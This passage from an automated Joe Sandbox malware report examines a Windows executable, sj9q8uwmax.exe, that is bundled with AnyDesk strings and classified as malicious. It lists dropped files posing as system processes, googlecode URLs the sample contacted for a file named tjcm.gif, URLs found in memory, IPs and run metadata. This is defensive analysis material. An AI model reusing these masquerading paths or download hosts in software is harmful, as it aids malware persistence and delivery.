                                C:\Windows\Resources\spoolsv.exe100%Joe Sandbox ML
                                C:\Windows\Resources\svchost.exe100%Joe Sandbox ML
                                C:\Windows\Resources\Themes\explorer.exe100%Joe Sandbox ML
                                C:\Users\user\Desktop\sj9q8uwmax.exe 3%MetadefenderBrowse
                                C:\Users\user\Desktop\sj9q8uwmax.exe 0%ReversingLabs

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                SourceDetectionScannerLabelLink
                                codecmd01.googlecode.com0%VirustotalBrowse
                                codecmd03.googlecode.com0%VirustotalBrowse

                                URLs

                                SourceDetectionScannerLabelLink
                                http://ns.adobe.c/g0%URL Reputationsafe
                                http://codecmd02.googlecode.com/files/tjcm.gif0%Avira URL Cloudsafe
                                https://boot.net.anydesk.comabcdefABCDEFtruefalsebase.prot.packetInvalid0%Avira URL Cloudsafe
                                http://codecmd03.googlecode.com/files/tjcm.gif0%Avira URL Cloudsafe
                                http://ns.adobe.cobj0%URL Reputationsafe
                                http://codecmd01.googlecode.com/files/tjcm.gif0%Avira URL Cloudsafe
                                https://my.anydesk.coms0%Avira URL Cloudsafe
                                http://ns.ado/10%URL Reputationsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                boot.net.anydesk.com
                                		185.229.191.39
                                		truefalse
                                  		high
                                  googlecode.l.googleusercontent.com
                                  		142.250.102.82
                                  		truefalse
                                    		high
                                    codecmd01.googlecode.com
                                    		unknown
                                    		unknowntrueunknown
                                    codecmd03.googlecode.com
                                    		unknown
                                    		unknowntrueunknown
                                    codecmd02.googlecode.com
                                    		unknown
                                    		unknowntrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://codecmd02.googlecode.com/files/tjcm.giffalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://codecmd03.googlecode.com/files/tjcm.giffalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://codecmd01.googlecode.com/files/tjcm.giffalse
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://help.anydesk.com/ensj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://support.anydesk.com/sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                          		high
                                          https://support.anydesk.com/fsj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://order.anydesk.com/trialsj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                              		high
                                              https://anydesk.com/updatesj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                		high
                                                https://www.google.com/intl/$sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                  		high
                                                  https://anydesk.com/order2sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://help.anydesk.com/macos-securitys.sj9q8uwmax.exe , 00000001.00000002.763503240.0000000003A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://my.anydesk.comsj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                        		high
                                                        http://ns.adobe.c/gsj9q8uwmax.exe , 00000001.00000003.461286187.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.764979477.0000000003D70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://twitter.com/home?status=Do%20you%20know%20%23AnyDesk?%20AnyDesk%20is%20a%20small%20and%20quisj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                          		high
                                                          https://help.anydesk.com/backup-aliasnsj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.762176654.0000000003591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.openssl.org/support/faq.htmlsj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                              		high
                                                              https://anydesk.com/sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                		high
                                                                https://anydesk.com/privacysj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                  		high
                                                                  https://datatracker.ietf.org/ipr/1526/sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                    		high
                                                                    https://www.nayuki.io/page/qr-code-generator-librarysj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                      		high
                                                                      https://policies.google.com/privacy?hl=$sj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                        		high
                                                                        https://support.anydesk.com/AnyDesk_on_macOSsj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                          		high
                                                                          https://help.anydesk.com/nnlsj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://policies.google.com/privacy?hl=en$sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://help.anydesk.com/macos-securitysj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                		high
                                                                                https://help.anydesk.com/en/android-batterysj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://datatracker.ietf.org/ipr/1914/sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                    		high
                                                                                    https://policies.google.com/privacy?hl=ensj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://anydesk.com/termssj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                        		high
                                                                                        https://boot.net.anydesk.comabcdefABCDEFtruefalsebase.prot.packetInvalidsj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://anydesk.com/updater~sj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://anydesk.com/ordersj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                            		high
                                                                                            https://help.anydesk.com/backup-aliassj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                              		high
                                                                                              https://www.google.com/intl/ensj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://my.anydesk.com/password-generator.sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                  		high
                                                                                                  https://help.anydesk.com/sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                    		high
                                                                                                    https://anydesk.comsj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                      		high
                                                                                                      https://support.anydesk.com/.sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://help.anydesk.com/sharehsj9q8uwmax.exe , 00000001.00000002.763503240.0000000003A00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://anydesk.com/pa/sj9q8uwmax.exe , 00000001.00000003.458587076.000000000359C000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458652270.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458843771.00000000035A1000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458065682.000000000358F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://ns.adobe.cobjsj9q8uwmax.exe , 00000001.00000003.461286187.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.764979477.0000000003D70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://www.opengl.org/registry/sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                              		high
                                                                                                              https://help.anydesk.com/error-messagessj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.google.com/intl/sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://help.anydesk.com/wolsj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://help.anydesk.com/$sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://help.anydesk.com/shareWsj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.anydesk.com/sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.linkedin.com/shareArticle?mini=true&url=https%3A//anydesk.com/&title=Try%20AnyDesk%20Remsj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://console-ui.myanydesk2.on.anydesk.comsj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://support.anydesk.comsj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://my.anydesk.comssj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://policies.google.com/privacy?hl=enfsj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://anydesk.com/terms~lsj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://help.anydesk.com/HelpLinkInstallLocationAnyDesksj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://boot-01.net.anydesk.comsj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://datatracker.ietf.org/ipr/1524/sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://anydesk.com/company#imprintsj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://www.openssl.org/)sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://help.anydesk.com/6ksj9q8uwmax.exe , 00000001.00000003.458795894.00000000034FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://help.anydesk.com/accesssj9q8uwmax.exe , 00000001.00000003.458787868.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://www.openssl.org/support/faq.htmlEC_PRIVATEKEYpublicKeyparametersprivateKeyECPKPARAMETERSvaluesj9q8uwmax.exe , 00000001.00000003.452980475.00000000021F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://help.anydesk.com/sharesj9q8uwmax.exe , 00000001.00000003.458851147.00000000035AE000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.763503240.0000000003A00000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000003.446344322.00000000017F9000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.726721598.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000003.00000002.726721617.00000000009DB000.00000002.00000001.01000000.00000006.sdmp, sj9q8uwmax.exe , 00000006.00000002.726722207.00000000009DB000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://ns.ado/1sj9q8uwmax.exe , 00000001.00000003.461286187.0000000003D81000.00000004.00000800.00020000.00000000.sdmp, sj9q8uwmax.exe , 00000001.00000002.764979477.0000000003D70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown

                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public IPs

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      92.223.88.41
                                                                                                                                                      		unknownAustria
                                                                                                                                                      		199524GCOREATfalse
                                                                                                                                                      49.12.130.236
                                                                                                                                                      		unknownGermany
                                                                                                                                                      		24940HETZNER-ASDEfalse
                                                                                                                                                      49.12.130.237
                                                                                                                                                      		unknownGermany
                                                                                                                                                      		24940HETZNER-ASDEfalse
                                                                                                                                                      185.229.191.39
                                                                                                                                                      		boot.net.anydesk.comCzech Republic
                                                                                                                                                      		60068CDN77GBfalse
                                                                                                                                                      142.250.102.82
                                                                                                                                                      		googlecode.l.googleusercontent.comUnited States
                                                                                                                                                      		15169GOOGLEUSfalse

                                                                                                                                                      Private

                                                                                                                                                      IP
                                                                                                                                                      192.168.2.1
                                                                                                                                                      127.0.0.1

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                      Analysis ID:666578
                                                                                                                                                      Start date and time: 16/07/202223:55:232022-07-16 23:55:23 +02:00
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 11m 34s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Sample file name:sJ9Q8UWMAX.com_7fdb00c80f0250575a05601c08627d50 (renamed file extension from com_7fdb00c80f0250575a05601c08627d50 to exe)
                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Number of analysed new started processes analysed:21
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal100.spre.evad.winEXE@22/19@15/7
                                                                                                                                                      EGA Information:
                                                                                                                                                      • Successful, ratio: 50%
                                                                                                                                                      HDC Information:
                                                                                                                                                      • Successful, ratio: 3.6% (good quality ratio 0%)
                                                                                                                                                      • Quality average: 0%
                                                                                                                                                      • Quality standard deviation: 0%
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      • Number of executed functions: 10
                                                                                                                                                      • Number of non-executed functions: 49
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI

                                                                                                                                                      Warnings

                                                                                                                                                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                      • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 23.211.4.86, 40.125.122.176, 52.242.101.226, 20.223.24.244, 20.238.103.94, 52.152.110.14
